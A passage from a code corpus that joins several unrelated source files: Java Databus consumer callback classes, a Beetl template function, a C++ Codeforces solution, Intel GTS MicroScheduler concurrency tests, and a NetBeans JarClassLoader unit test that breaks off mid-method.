long nanoRunTime = getNanoRunTime();
if (_consumerStats != null)
{
long totalTime = (nanoRunTime + getNanoTimeInQueue()) / DbusConstants.NUM_NSECS_IN_MSEC;
_consumerStats.registerDataEventsProcessed(1, totalTime, _event);
}
if (_unifiedClientStats != null)
{
_unifiedClientStats.registerCallbacksProcessed(nanoRunTime);
}
}
}
}
class StopBootstrapCallable extends ConsumerCallable<ConsumerCallbackResult>
{
private final DatabusCombinedConsumer _consumer;
private final ConsumerCallbackStats _consumerStats;
private final UnifiedClientStats _unifiedClientStats;
public StopBootstrapCallable(long currentNanos,
DatabusCombinedConsumer consumer,
ConsumerCallbackStats consumerStats,
UnifiedClientStats unifiedClientStats)
{
super(currentNanos);
_consumer = consumer;
_consumerStats = consumerStats;
_unifiedClientStats = unifiedClientStats;
}
@Override
protected ConsumerCallbackResult doCall() throws Exception
{
return _consumer.onStopBootstrap();
}
@Override
protected void doEndCall(ConsumerCallbackResult result)
{
if (result==ConsumerCallbackResult.ERROR || result==ConsumerCallbackResult.ERROR_FATAL)
{
if (_consumerStats != null) _consumerStats.registerErrorEventsProcessed(1);
if (_unifiedClientStats != null) _unifiedClientStats.registerCallbackError();
}
else
{
long nanoRunTime = getNanoRunTime();
if (_consumerStats != null)
{
long totalTime = (nanoRunTime + getNanoTimeInQueue()) / DbusConstants.NUM_NSECS_IN_MSEC;
_consumerStats.registerEventsProcessed(1, totalTime);
}
if (_unifiedClientStats != null)
{
_unifiedClientStats.registerCallbacksProcessed(nanoRunTime);
}
}
}
}
class EndBootstrapEventSequenceCallable extends ConsumerCallable<ConsumerCallbackResult>
{
private final SCN _scn;
private final DatabusCombinedConsumer _consumer;
private final ConsumerCallbackStats _consumerStats;
private final UnifiedClientStats _unifiedClientStats;
public EndBootstrapEventSequenceCallable(long currentNanos, SCN scn,
DatabusCombinedConsumer consumer,
ConsumerCallbackStats consumerStats,
UnifiedClientStats unifiedClientStats)
{
super(currentNanos);
_scn = scn;
_consumer = consumer;
_consumerStats = consumerStats;
_unifiedClientStats = unifiedClientStats;
}
@Override
protected ConsumerCallbackResult doCall() throws Exception
{
return _consumer.onEndBootstrapSequence(_scn);
}
@Override
protected void doEndCall(ConsumerCallbackResult result)
{
if (result==ConsumerCallbackResult.ERROR || result==ConsumerCallbackResult.ERROR_FATAL)
{
if (_consumerStats != null) _consumerStats.registerSysErrorsProcessed();
if (_unifiedClientStats != null) _unifiedClientStats.registerCallbackError();
}
else
{
long nanoRunTime = getNanoRunTime();
if (_consumerStats != null)
{
long totalTime = (nanoRunTime + getNanoTimeInQueue()) / DbusConstants.NUM_NSECS_IN_MSEC;
_consumerStats.registerSystemEventProcessed(totalTime);
}
if (_unifiedClientStats != null)
{
_unifiedClientStats.registerCallbacksProcessed(nanoRunTime);
}
}
}
}
class EndBootstrapSourceCallable extends ConsumerCallable<ConsumerCallbackResult>
{
private final String _source;
private final Schema _sourceSchema;
private final DatabusCombinedConsumer _consumer;
private final ConsumerCallbackStats _consumerStats;
private final UnifiedClientStats _unifiedClientStats;
public EndBootstrapSourceCallable(long currentNanos,
String source,
Schema sourceSchema,
DatabusCombinedConsumer consumer,
ConsumerCallbackStats consumerStats,
UnifiedClientStats unifiedClientStats)
{
super(currentNanos);
_source = source;
_sourceSchema = sourceSchema;
_consumer = consumer;
_consumerStats = consumerStats;
_unifiedClientStats = unifiedClientStats;
}
@Override
protected ConsumerCallbackResult doCall() throws Exception
{
return _consumer.onEndBootstrapSource(_source, _sourceSchema);
}
@Override
protected void doEndCall(ConsumerCallbackResult result)
{
if (result==ConsumerCallbackResult.ERROR || result==ConsumerCallbackResult.ERROR_FATAL)
{
if (_consumerStats != null) _consumerStats.registerErrorEventsProcessed(1);
if (_unifiedClientStats != null) _unifiedClientStats.registerCallbackError();
}
else
{
long nanoRunTime = getNanoRunTime();
if (_consumerStats != null)
{
long totalTime = (nanoRunTime + getNanoTimeInQueue()) / DbusConstants.NUM_NSECS_IN_MSEC;
_consumerStats.registerEventsProcessed(1, totalTime);
}
if (_unifiedClientStats != null)
{
_unifiedClientStats.registerCallbacksProcessed(nanoRunTime);
}
}
}
}
class BootstrapRollbackCallable extends ConsumerCallable<ConsumerCallbackResult>
{
private final SCN _scn;
private final DatabusCombinedConsumer _consumer;
private final ConsumerCallbackStats _consumerStats;
private final UnifiedClientStats _unifiedClientStats;
public BootstrapRollbackCallable(long currentNanos, SCN scn,
DatabusCombinedConsumer consumer,
ConsumerCallbackStats consumerStats,
UnifiedClientStats unifiedClientStats)
{
super(currentNanos);
_scn = scn;
_consumer = consumer;
_consumerStats = consumerStats;
_unifiedClientStats = unifiedClientStats;
}
@Override
protected ConsumerCallbackResult doCall() throws Exception
{
return _consumer.onBootstrapRollback(_scn);
}
@Override
protected void doEndCall(ConsumerCallbackResult result)
{
if (result==ConsumerCallbackResult.ERROR || result==ConsumerCallbackResult.ERROR_FATAL)
{
if (_consumerStats != null) _consumerStats.registerErrorEventsProcessed(1);
if (_unifiedClientStats != null) _unifiedClientStats.registerCallbackError();
}
else
{
long nanoRunTime = getNanoRunTime();
if (_consumerStats != null)
{
long totalTime = (nanoRunTime + getNanoTimeInQueue()) / DbusConstants.NUM_NSECS_IN_MSEC;
_consumerStats.registerEventsProcessed(1, totalTime);
}
if (_unifiedClientStats != null)
{
_unifiedClientStats.registerCallbacksProcessed(nanoRunTime);
}
}
}
}
class StartBootstrapCallable extends ConsumerCallable<ConsumerCallbackResult>
{
private final DatabusCombinedConsumer _consumer;
private final ConsumerCallbackStats _consumerStats;
private final UnifiedClientStats _unifiedClientStats;
public StartBootstrapCallable(long currentNanos,
DatabusCombinedConsumer consumer,
ConsumerCallbackStats consumerStats,
UnifiedClientStats unifiedClientStats)
{
super(currentNanos);
_consumer = consumer;
_consumerStats = consumerStats;
_unifiedClientStats = unifiedClientStats;
}
@Override
protected ConsumerCallbackResult doCall() throws Exception
{
return _consumer.onStartBootstrap();
}
@Override
protected void doEndCall(ConsumerCallbackResult result)
{
if (result==ConsumerCallbackResult.ERROR || result==ConsumerCallbackResult.ERROR_FATAL)
{
if (_consumerStats != null) _consumerStats.registerErrorEventsProcessed(1);
if (_unifiedClientStats != null) _unifiedClientStats.registerCallbackError();
}
else
{
long nanoRunTime = getNanoRunTime();
if (_consumerStats != null)
{
long totalTime = (nanoRunTime + getNanoTimeInQueue()) / DbusConstants.NUM_NSECS_IN_MSEC;
_consumerStats.registerEventsProcessed(1, totalTime);
}
if (_unifiedClientStats != null)
{
_unifiedClientStats.registerCallbacksProcessed(nanoRunTime);
}
}
}
}
class StartBootstrapEventSequenceCallable extends ConsumerCallable<ConsumerCallbackResult>
{
private final SCN _scn;
private final DatabusCombinedConsumer _consumer;
private final ConsumerCallbackStats _consumerStats;
private final UnifiedClientStats _unifiedClientStats;
public StartBootstrapEventSequenceCallable(long currentNanos, SCN scn,
DatabusCombinedConsumer consumer,
ConsumerCallbackStats consumerStats,
UnifiedClientStats unifiedClientStats)
{
super(currentNanos);
_scn = scn;
_consumer = consumer;
_consumerStats = consumerStats;
_unifiedClientStats = unifiedClientStats;
}
@Override
protected ConsumerCallbackResult doCall() throws Exception
{
return _consumer.onStartBootstrapSequence(_scn);
}
@Override
protected void doEndCall(ConsumerCallbackResult result)
{
if (result==ConsumerCallbackResult.ERROR || result==ConsumerCallbackResult.ERROR_FATAL)
{
if (_consumerStats != null) _consumerStats.registerErrorEventsProcessed(1);
if (_unifiedClientStats != null) _unifiedClientStats.registerCallbackError();
}
else
{
long nanoRunTime = getNanoRunTime();
if (_consumerStats != null)
{
long totalTime = (nanoRunTime + getNanoTimeInQueue()) / DbusConstants.NUM_NSECS_IN_MSEC;
_consumerStats.registerEventsProcessed(1, totalTime);
}
if (_unifiedClientStats != null)
{
_unifiedClientStats.registerCallbacksProcessed(nanoRunTime);
}
}
}
}
class StartBootstrapSourceCallable extends ConsumerCallable<ConsumerCallbackResult>
{
private final String _source;
private final Schema _sourceSchema;
private final DatabusCombinedConsumer _consumer;
private final ConsumerCallbackStats _consumerStats;
private final UnifiedClientStats _unifiedClientStats;
public StartBootstrapSourceCallable(long currentNanos,
String source,
Schema sourceSchema,
DatabusCombinedConsumer consumer,
ConsumerCallbackStats consumerStats,
UnifiedClientStats unifiedClientStats)
{
super(currentNanos);
_source = source;
_sourceSchema = sourceSchema;
_consumer = consumer;
_consumerStats = consumerStats;
_unifiedClientStats = unifiedClientStats;
}
@Override
protected ConsumerCallbackResult doCall() throws Exception
{
return _consumer.onStartBootstrapSource(_source, _sourceSchema);
}
@Override
protected void doEndCall(ConsumerCallbackResult result)
{
if (result==ConsumerCallbackResult.ERROR || result==ConsumerCallbackResult.ERROR_FATAL)
{
if (_consumerStats != null) _consumerStats.registerErrorEventsProcessed(1);
if (_unifiedClientStats != null) _unifiedClientStats.registerCallbackError();
}
else
{
long nanoRunTime = getNanoRunTime();
if (_consumerStats != null)
{
long totalTime = (nanoRunTime + getNanoTimeInQueue()) / DbusConstants.NUM_NSECS_IN_MSEC;
_consumerStats.registerEventsProcessed(1, totalTime);
}
if (_unifiedClientStats != null)
{
_unifiedClientStats.registerCallbacksProcessed(nanoRunTime);
}
}
}
}
| 10,841 |
441 | package org.beetl.ext.fn;
import org.beetl.core.Context;
import org.beetl.core.Function;
/** 动态引用全局变量,dynamic(a+"_index");
* @author xiandafu
*
*/
public class DynamicGlobalValueFunction implements Function {
@Override
public Object call(Object[] paras, Context ctx) {
String key = (String)paras[0];
return ctx.globalVar.get(key);
}
}
| 149 |
506 | <reponame>kamal1316/competitive-programming
// https://codeforces.com/contest/1536/problem/B
#include <bits/stdc++.h>
using namespace std;
using ll = long long;
string s;
string ans;
void search() {
if (s.find(ans) == string::npos) return;
int n = ans.size();
if (ans.back() == 'z') {
int i = 0;
while (i < n) {
if (ans[n - i - 1] == 'z') i++;
else
break;
}
if (i == n) {
for (int j = 0; j < n; j++) ans[j] = 'a';
ans.push_back('a');
search();
return;
}
ans[n - i - 1]++;
for (int j = 0; j < i; j++) ans[n - j - 1] = 'a';
search();
return;
}
ans[n - 1]++;
search();
}
int main() {
cin.tie(0), ios::sync_with_stdio(0);
int t, n;
cin >> t;
while (t--) {
cin >> n >> s;
ans = string("a");
search();
cout << ans << '\n';
}
}
| 418 |
417 | /*******************************************************************************
* Copyright 2019 Intel Corporation
*
* Permission is hereby granted, free of charge, to any person obtaining a copy
* of this software and associated documentation files(the "Software"), to deal
* in the Software without restriction, including without limitation the rights
* to use, copy, modify, merge, publish, distribute, sublicense, and / or sell
* copies of the Software, and to permit persons to whom the Software is
* furnished to do so, subject to the following conditions :
*
* The above copyright notice and this permission notice shall be included in
* all copies or substantial portions of the Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.IN NO EVENT SHALL THE
* AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
* LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
* OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
* THE SOFTWARE.
******************************************************************************/
#include <gmock/gmock.h>
#include <gtest/gtest.h>
#include <cstdlib>
#include <thread>
#include <functional>
#include "gts/platform/Atomic.h"
#include "gts/analysis/Trace.h"
#include "gts/micro_scheduler/WorkerPool.h"
#include "gts/micro_scheduler/MicroScheduler.h"
#include "SchedulerTestsCommon.h"
using namespace gts;
namespace testing {
using WorkFunc = std::function<void(MicroScheduler&)>;
////////////////////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////////////////////
// INIT/SHUTDOWN TESTS:
//------------------------------------------------------------------------------
TEST(MicroScheduler, initializeMultipleSameThread)
{
WorkerPool workerPool;
workerPool.initialize();
constexpr uint32_t NUM_SCHEDULERS = 10;
MicroScheduler taskScheduler[NUM_SCHEDULERS];
for (uint32_t ii = 0; ii < NUM_SCHEDULERS; ++ii)
{
bool result = taskScheduler[ii].initialize(&workerPool);
ASSERT_TRUE(result);
}
for (uint32_t ii = 0; ii < NUM_SCHEDULERS; ++ii)
{
taskScheduler[ii].shutdown();
}
}
//------------------------------------------------------------------------------
void TestMultipleSchedulers(
const uint32_t threadCount,
const uint32_t schedulerCount,
WorkFunc& fcnWork)
{
WorkerPool workerPool;
workerPool.initialize(threadCount);
MicroScheduler taskScheduler;
taskScheduler.initialize(&workerPool);
gts::Vector<std::thread*> threads(schedulerCount);
std::atomic<bool> startInitialize = { false };
std::atomic<uint32_t> initCount = { 0 };
std::atomic<bool> startWork = { false };
std::atomic<uint32_t> shutdownCount = { 0 };
for (uint32_t ii = 0; ii < schedulerCount; ++ii)
{
std::thread* pThread = new std::thread([&]()
{
MicroScheduler taskScheduler;
while (!startInitialize.load(std::memory_order::memory_order_acquire))
{
GTS_PAUSE();
}
taskScheduler.initialize(&workerPool);
++initCount;
while (!startWork.load(std::memory_order::memory_order_acquire))
{
GTS_PAUSE();
}
fcnWork(taskScheduler);
taskScheduler.shutdown();
++shutdownCount;
});
threads[ii] = pThread;
}
startInitialize = true;
while (initCount.load(std::memory_order::memory_order_acquire) < schedulerCount)
{
GTS_PAUSE();
}
startWork = true;
fcnWork(taskScheduler);
taskScheduler.shutdown();
while(shutdownCount.load(std::memory_order::memory_order_acquire) < schedulerCount)
{
GTS_PAUSE();
}
workerPool.shutdown();
for (uint32_t ii = 0; ii < schedulerCount; ++ii)
{
threads[ii]->join();
delete threads[ii];
}
}
//------------------------------------------------------------------------------
WorkFunc EmptyWork = [](MicroScheduler&)
{};
//------------------------------------------------------------------------------
TEST(MicroScheduler, testInitShutownWorker1Scheduler)
{
for (uint32_t ii = 0; ii < ITERATIONS_CONCUR; ++ii)
{
GTS_TRACE_FRAME_MARK(gts::analysis::CaptureMask::ALL);
TestMultipleSchedulers(1, 1, EmptyWork);
MicroScheduler::resetIdGenerator();
}
}
//------------------------------------------------------------------------------
TEST(MicroScheduler, testInitShutownNWorker1Schedulers)
{
for (uint32_t ii = 0; ii < ITERATIONS_CONCUR; ++ii)
{
GTS_TRACE_FRAME_MARK(gts::analysis::CaptureMask::ALL);
TestMultipleSchedulers(gts::Thread::getHardwareThreadCount(), 1, EmptyWork);
MicroScheduler::resetIdGenerator();
}
}
//------------------------------------------------------------------------------
TEST(MicroScheduler, testInitShutown1WorkerNSchedulers)
{
for (uint32_t ii = 0; ii < ITERATIONS_CONCUR; ++ii)
{
GTS_TRACE_FRAME_MARK(gts::analysis::CaptureMask::ALL);
TestMultipleSchedulers(1, gts::Thread::getHardwareThreadCount(), EmptyWork);
MicroScheduler::resetIdGenerator();
}
}
//------------------------------------------------------------------------------
TEST(MicroScheduler, testInitShutownNWorkerNSchedulers)
{
for (uint32_t ii = 0; ii < ITERATIONS_CONCUR; ++ii)
{
GTS_TRACE_FRAME_MARK(gts::analysis::CaptureMask::ALL);
TestMultipleSchedulers(gts::Thread::getHardwareThreadCount(), gts::Thread::getHardwareThreadCount(), EmptyWork);
MicroScheduler::resetIdGenerator();
}
}
////////////////////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////////////////////
// SPAWN TESTS:
struct alignas(GTS_NO_SHARING_CACHE_LINE_SIZE) AlignedCounter
{
gts::Atomic<uint32_t> counter;
char pad[GTS_NO_SHARING_CACHE_LINE_SIZE - sizeof(gts::Atomic<uint32_t>)];
};
////////////////////////////////////////////////////////////////////////////////
struct TaskCounter : public Task
{
TaskCounter(AlignedCounter* taskCountByThreadIdx)
: taskCountByThreadIdx(taskCountByThreadIdx)
{}
//--------------------------------------------------------------------------
// Count the task when its executed.
Task* execute(TaskContext const& ctx)
{
taskCountByThreadIdx[ctx.workerId.localId()].counter.fetch_add(1, memory_order::release);
return nullptr;
}
AlignedCounter* taskCountByThreadIdx;
};
////////////////////////////////////////////////////////////////////////////////
struct TaskCounterGenerator : public Task
{
//--------------------------------------------------------------------------
// Root task for TestSpawnTask
Task* execute(TaskContext const& ctx)
{
addRef(numTasks + 1);
for (uint32_t ii = 0; ii < numTasks; ++ii)
{
Task* pTask = ctx.pMicroScheduler->allocateTask<TaskCounter>(taskCountByThreadIdx);
addChildTaskWithoutRef(pTask);
ctx.pMicroScheduler->spawnTask(pTask);
}
waitForAll();
return nullptr;
}
uint32_t numTasks;
AlignedCounter* taskCountByThreadIdx;
};
//------------------------------------------------------------------------------
void SpawnTasks(MicroScheduler& taskScheduler, const uint32_t numTasks, const uint32_t threadCount)
{
// Create a counter per thread.
std::vector<AlignedCounter> taskCountByThreadIdx(threadCount);
for (auto& counter : taskCountByThreadIdx)
{
counter.counter.store(0, memory_order::release);
}
TaskCounterGenerator* pRootTask = taskScheduler.allocateTask<TaskCounterGenerator>();
pRootTask->numTasks = numTasks;
pRootTask->taskCountByThreadIdx = taskCountByThreadIdx.data();
taskScheduler.spawnTaskAndWait(pRootTask);
// Total up the counters
uint32_t numTasksCompleted = 0;
for (auto& counter : taskCountByThreadIdx)
{
numTasksCompleted += counter.counter.load(memory_order::acquire);
}
// Verify all the tasks ran.
ASSERT_EQ(numTasks, numTasksCompleted);
}
//------------------------------------------------------------------------------
TEST(MicroScheduler, testSpawn1Worker1Scheduler)
{
for (uint32_t ii = 0; ii < ITERATIONS_CONCUR; ++ii)
{
GTS_TRACE_FRAME_MARK(gts::analysis::CaptureMask::ALL);
uint32_t numTasks = TEST_DEPTH;
uint32_t threadCount = 1;
uint32_t schedulerCount = 1;
WorkFunc work = [&](MicroScheduler& taskScheduler)
{
SpawnTasks(taskScheduler, numTasks, threadCount);
};
TestMultipleSchedulers(threadCount, schedulerCount, work);
MicroScheduler::resetIdGenerator();
}
}
//------------------------------------------------------------------------------
TEST(MicroScheduler, testSpawnNWorker1Scheduler)
{
for (uint32_t ii = 0; ii < ITERATIONS_CONCUR; ++ii)
{
GTS_TRACE_FRAME_MARK(gts::analysis::CaptureMask::ALL);
uint32_t numTasks = TEST_DEPTH;
uint32_t threadCount = gts::Thread::getHardwareThreadCount();
uint32_t schedulerCount = 1;
WorkFunc work = [&](MicroScheduler& taskScheduler)
{
SpawnTasks(taskScheduler, numTasks, threadCount);
};
TestMultipleSchedulers(threadCount, schedulerCount, work);
MicroScheduler::resetIdGenerator();
}
}
//------------------------------------------------------------------------------
TEST(MicroScheduler, testSpawn1WorkerNSchedulers)
{
for (uint32_t ii = 0; ii < ITERATIONS_CONCUR; ++ii)
{
GTS_TRACE_FRAME_MARK(gts::analysis::CaptureMask::ALL);
uint32_t numTasks = TEST_DEPTH;
uint32_t threadCount = 1;
uint32_t schedulerCount = gts::Thread::getHardwareThreadCount();
WorkFunc work = [&](MicroScheduler& taskScheduler)
{
SpawnTasks(taskScheduler, numTasks, threadCount);
};
TestMultipleSchedulers(threadCount, schedulerCount, work);
MicroScheduler::resetIdGenerator();
}
}
//------------------------------------------------------------------------------
TEST(MicroScheduler, testSpawnNWorkerNSchedulers)
{
for (uint32_t ii = 0; ii < ITERATIONS_CONCUR; ++ii)
{
GTS_TRACE_FRAME_MARK(gts::analysis::CaptureMask::ALL);
uint32_t numTasks = TEST_DEPTH;
uint32_t threadCount = gts::Thread::getHardwareThreadCount();
uint32_t schedulerCount = gts::Thread::getHardwareThreadCount();
WorkFunc work = [&](MicroScheduler& taskScheduler)
{
SpawnTasks(taskScheduler, numTasks, threadCount);
};
TestMultipleSchedulers(threadCount, schedulerCount, work);
MicroScheduler::resetIdGenerator();
}
}
////////////////////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////////////////////
// REGISTER/UNREGISTER TESTS:
//------------------------------------------------------------------------------
void TestMultipleSchedulersRegistrationAndWork(
const uint32_t threadCount,
const uint32_t schedulerCount,
WorkFunc& fcnWork)
{
WorkerPool workerPool;
workerPool.initialize(threadCount);
gts::Vector<std::thread*> threads(schedulerCount);
std::atomic<uint32_t> shutdownCount = { 0 };
constexpr uint32_t iterations = 20;
for (uint32_t ii = 0; ii < schedulerCount; ++ii)
{
std::thread* pThread = new std::thread([&]()
{
for (uint32_t iter = 0; iter < iterations; ++iter)
{
MicroScheduler taskScheduler;
taskScheduler.initialize(&workerPool);
fcnWork(taskScheduler);
taskScheduler.shutdown();
}
++shutdownCount;
});
threads[ii] = pThread;
}
for (uint32_t iter = 0; iter < iterations; ++iter)
{
MicroScheduler taskScheduler;
taskScheduler.initialize(&workerPool);
fcnWork(taskScheduler);
taskScheduler.shutdown();
}
while(shutdownCount.load(std::memory_order::memory_order_acquire) < schedulerCount)
{
GTS_PAUSE();
}
workerPool.shutdown();
for (uint32_t ii = 0; ii < schedulerCount; ++ii)
{
threads[ii]->join();
delete threads[ii];
}
}
//------------------------------------------------------------------------------
TEST(MicroScheduler, testRegisterAndWork1Worker1Scheduler)
{
for (uint32_t ii = 0; ii < ITERATIONS_CONCUR; ++ii)
{
GTS_TRACE_FRAME_MARK(gts::analysis::CaptureMask::ALL);
uint32_t numTasks = TEST_DEPTH;
uint32_t threadCount = 1;
uint32_t schedulerCount = 1;
WorkFunc work = [&](MicroScheduler& taskScheduler)
{
SpawnTasks(taskScheduler, numTasks, threadCount);
};
TestMultipleSchedulersRegistrationAndWork(threadCount, schedulerCount, work);
MicroScheduler::resetIdGenerator();
}
}
//------------------------------------------------------------------------------
TEST(MicroScheduler, testRegisterAndWorkNWorker1Scheduler)
{
for (uint32_t ii = 0; ii < ITERATIONS_CONCUR; ++ii)
{
GTS_TRACE_FRAME_MARK(gts::analysis::CaptureMask::ALL);
uint32_t numTasks = TEST_DEPTH;
uint32_t threadCount = gts::Thread::getHardwareThreadCount();
uint32_t schedulerCount = 1;
WorkFunc work = [&](MicroScheduler& taskScheduler)
{
SpawnTasks(taskScheduler, numTasks, threadCount);
};
TestMultipleSchedulersRegistrationAndWork(threadCount, schedulerCount, work);
MicroScheduler::resetIdGenerator();
}
}
//------------------------------------------------------------------------------
TEST(MicroScheduler, testRegisterAndWork1WorkerNSchedulers)
{
for (uint32_t ii = 0; ii < ITERATIONS_CONCUR; ++ii)
{
GTS_TRACE_FRAME_MARK(gts::analysis::CaptureMask::ALL);
uint32_t numTasks = TEST_DEPTH;
uint32_t threadCount = 1;
uint32_t schedulerCount = gts::Thread::getHardwareThreadCount();
WorkFunc work = [&](MicroScheduler& taskScheduler)
{
SpawnTasks(taskScheduler, numTasks, threadCount);
};
TestMultipleSchedulersRegistrationAndWork(threadCount, schedulerCount, work);
MicroScheduler::resetIdGenerator();
}
}
//------------------------------------------------------------------------------
TEST(MicroScheduler, testRegisterAndWorkNWorkerNSchedulers)
{
for (uint32_t ii = 0; ii < ITERATIONS_CONCUR; ++ii)
{
GTS_TRACE_FRAME_MARK(gts::analysis::CaptureMask::ALL);
uint32_t numTasks = TEST_DEPTH;
uint32_t threadCount = gts::Thread::getHardwareThreadCount();
uint32_t schedulerCount = gts::Thread::getHardwareThreadCount();
WorkFunc work = [&](MicroScheduler& taskScheduler)
{
SpawnTasks(taskScheduler, numTasks, threadCount);
};
TestMultipleSchedulersRegistrationAndWork(threadCount, schedulerCount, work);
MicroScheduler::resetIdGenerator();
}
}
} // namespace testing
| 5,800 |
1,056 | /*
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing,
* software distributed under the License is distributed on an
* "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
* KIND, either express or implied. See the License for the
* specific language governing permissions and limitations
* under the License.
*/
package org.netbeans;
import java.io.DataInputStream;
import java.io.File;
import java.io.IOException;
import java.io.InputStream;
import java.io.Serializable;
import java.net.JarURLConnection;
import java.net.URL;
import java.net.URLClassLoader;
import java.net.URLConnection;
import java.util.Collections;
import java.util.Enumeration;
import java.util.List;
import java.util.Set;
import java.util.concurrent.Semaphore;
import java.util.jar.JarFile;
import java.util.jar.Manifest;
import java.util.logging.Level;
import java.util.logging.Logger;
import java.security.Permission;
import java.util.Map;
import junit.framework.AssertionFailedError;
import org.netbeans.junit.NbTestCase;
import org.openide.util.Utilities;
import org.openide.util.lookup.Lookups;
import org.openide.util.test.TestFileUtils;
/** Tests that cover some basic aspects of a Proxy/JarClassLoader.
*
* @author <NAME>
*/
public class JarClassLoaderTest extends NbTestCase {
private static Logger LOGGER = Logger.getLogger(ProxyClassLoader.class.getName());
public JarClassLoaderTest(String name) {
super(name);
}
@Override
protected void setUp() throws Exception {
LOGGER.setUseParentHandlers(false);
LOGGER.setLevel(Level.OFF);
clearWorkDir();
}
public void testCanLoadFromDefaultPackage() throws Exception {
File jar = new File(getWorkDir(), "default-package-resource.jar");
TestFileUtils.writeZipFile(jar, "resource.txt:content", "package/resource.txt:content");
JarClassLoader jcl = new JarClassLoader(Collections.singletonList(jar), new ProxyClassLoader[0]);
assertStreamContent(jcl.getResourceAsStream("package/resource.txt"), "content");
assertStreamContent(jcl.getResourceAsStream("/package/resource.txt"), "content");
assertStreamContent(jcl.getResourceAsStream("resource.txt"), "content");
assertStreamContent(jcl.getResourceAsStream("/resource.txt"), "content");
assertURLsContent(jcl.getResources("package/resource.txt"), "content");
assertURLsContent(jcl.getResources("/package/resource.txt"), "content");
assertURLsContent(jcl.getResources("resource.txt"), "content");
assertURLsContent(jcl.getResources("/resource.txt"), "content");
}
public void testKnowsWhichJarsHaveDefaultPackage() throws Exception {
final File nothing = new File(getWorkDir(), "nothing.jar");
TestFileUtils.writeZipFile(nothing, "package/resource.txt:content");
final File a1 = new File(getWorkDir(), "a1.jar");
TestFileUtils.writeZipFile(a1, "A.txt:A", "package/resourceA.txt:content");
final File a2 = new File(getWorkDir(), "a2.jar");
TestFileUtils.writeZipFile(a2, "A.txt:A2", "package/resourceA2.txt:content");
final File b = new File(getWorkDir(), "b.jar");
TestFileUtils.writeZipFile(b, "B.txt:B", "package/resourceB.txt:content");
class CntJCL extends JarClassLoader {
int queried;
public CntJCL(List<File> files, ClassLoader[] parents) {
super(files, parents);
}
@Override
public URL findResource(String name) {
queried++;
return super.findResource(name);
}
@Override
public Enumeration<URL> findResources(String name) {
queried++;
return super.findResources(name);
}
}
final CntJCL[] arr = new CntJCL[] {
new CntJCL(Collections.singletonList(nothing), new ClassLoader[0]),
new CntJCL(Collections.singletonList(a1), new ClassLoader[0]),
new CntJCL(Collections.singletonList(a2), new ClassLoader[0]),
new CntJCL(Collections.singletonList(b), new ClassLoader[0]),
};
ProxyClassLoader pcl = new ProxyClassLoader(arr, true);
assertURLsContent(pcl.getResources("A.txt"), "A", "A2");
assertEquals("No query to nothing.jar", 0, arr[0].queried);
assertEquals("One query to a1.jar", 1, arr[1].queried);
assertEquals("One query to a2.jar", 1, arr[2].queried);
assertEquals("No query to b.jar", 0, arr[3].queried);
assertURLsContent(pcl.getResources("B.txt"), "B");
assertEquals("No query to nothing.jar", 0, arr[0].queried);
assertEquals("Still One query to a1.jar", 1, arr[1].queried);
assertEquals("Still One query to a2.jar", 1, arr[2].queried);
assertEquals("One query to b.jar now", 1, arr[3].queried);
}
public void testCanLoadFromDefaultPackageCachedOldFormat() throws Exception {
doCanLoadCached("META-INF,/MANIFEST.MF,package");
}
public void testCanLoadFromDefaultPackageCached() throws Exception {
doCanLoadCached("META-INF,/MANIFEST.MF,package,default/resource.txt");
}
private void doCanLoadCached(String covPkg) throws Exception {
final File jar = new File(getWorkDir(), "default-package-resource-cached.jar");
TestFileUtils.writeZipFile(jar, "resource.txt:content", "package/resource.txt:content",
"META-INF/MANIFEST.MF:OpenIDE-Module: x.y.z\nCovered-Packages: " + covPkg + ",\n"
);
MockModuleInstaller inst = new MockModuleInstaller();
MockEvents ev = new MockEvents();
ModuleManager mm = new ModuleManager(inst, ev);
Module fake = new Module(mm, null, null, null) {
public List<File> getAllJars() {throw new UnsupportedOperationException();}
public void setReloadable(boolean r) { throw new UnsupportedOperationException();}
public void reload() throws IOException { throw new UnsupportedOperationException();}
protected void classLoaderUp(Set<Module> parents) throws IOException {throw new UnsupportedOperationException();}
protected void classLoaderDown() { throw new UnsupportedOperationException();}
protected void cleanup() { throw new UnsupportedOperationException();}
protected void destroy() { throw new UnsupportedOperationException("Not supported yet.");}
public boolean isFixed() { throw new UnsupportedOperationException("Not supported yet.");}
public Object getLocalizedAttribute(String attr) { throw new UnsupportedOperationException("Not supported yet.");}
public Manifest getManifest() {
try {
return new JarFile(jar, false).getManifest();
} catch (IOException ex) {
throw new AssertionFailedError(ex.getMessage());
}
}
};
JarClassLoader jcl = new JarClassLoader(Collections.singletonList(jar), new ProxyClassLoader[0], false, fake);
assertStreamContent(jcl.getResourceAsStream("package/resource.txt"), "content");
assertStreamContent(jcl.getResourceAsStream("/package/resource.txt"), "content");
assertStreamContent(jcl.getResourceAsStream("resource.txt"), "content");
assertStreamContent(jcl.getResourceAsStream("/resource.txt"), "content");
assertURLsContent(jcl.getResources("package/resource.txt"), "content");
assertURLsContent(jcl.getResources("/package/resource.txt"), "content");
assertURLsContent(jcl.getResources("resource.txt"), "content");
assertURLsContent(jcl.getResources("/resource.txt"), "content");
}
public void testCanLoadFromDefaultPackageDirs() throws Exception {
File dir = getWorkDir();
TestFileUtils.writeFile(new File(dir, "resource.txt"), "content");
TestFileUtils.writeFile(new File(dir, "package/resource.txt"), "content");
TestFileUtils.writeFile(new File(dir, "META-INF/services/resource.txt"), "content");
